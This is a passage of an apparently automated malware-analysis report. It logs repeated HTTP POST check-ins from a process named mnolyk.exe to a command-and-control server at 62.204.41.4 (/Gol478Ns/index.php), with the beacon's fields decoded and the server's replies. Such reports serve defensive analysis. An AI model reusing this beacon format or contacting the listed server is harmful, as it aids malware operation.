                                                                    14 | 192.168.2.3 | 49715 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:13.538250923 CET | 214 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:13.601097107 CET | 215 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    140 | 192.168.2.3 | 49842 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:56.777808905 CET | 341 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.840537071 CET | 341 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    141 | 192.168.2.3 | 49843 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:57.016438007 CET | 342 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.083431959 CET | 342 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    142 | 192.168.2.3 | 49844 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:57.262975931 CET | 342 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.326699972 CET | 343 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    143 | 192.168.2.3 | 49845 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:57.496565104 CET | 344 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.558598042 CET | 344 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    144 | 192.168.2.3 | 49846 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:57.735833883 CET | 345 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.798593044 CET | 345 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    145 | 192.168.2.3 | 49847 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:57.967039108 CET | 346 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.030903101 CET | 346 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    146 | 192.168.2.3 | 49848 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:58.209736109 CET | 347 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.275710106 CET | 347 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    147 | 192.168.2.3 | 49849 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:58.454915047 CET | 348 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.518615007 CET | 348 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    148 | 192.168.2.3 | 49850 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:58.686515093 CET | 349 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.752574921 CET | 349 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    149 | 192.168.2.3 | 49851 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:58.949709892 CET | 350 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.014894009 CET | 350 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    15 | 192.168.2.3 | 49716 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:14.532463074 CET | 216 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:14.598109961 CET | 216 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    150 | 192.168.2.3 | 49852 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:59.185303926 CET | 351 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.249834061 CET | 351 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    151 | 192.168.2.3 | 49853 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:59.419398069 CET | 352 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.483755112 CET | 352 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    152 | 192.168.2.3 | 49854 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:59.659125090 CET | 353 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.722232103 CET | 353 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    153 | 192.168.2.3 | 49855 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:59.888895035 CET | 354 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:59.953712940 CET | 354 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    154 | 192.168.2.3 | 49856 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:00.132401943 CET | 355 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.197011948 CET | 355 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    155 | 192.168.2.3 | 49857 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:00.376327991 CET | 356 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.440331936 CET | 356 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    156 | 192.168.2.3 | 49858 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:00.606919050 CET | 357 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.671504974 CET | 357 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


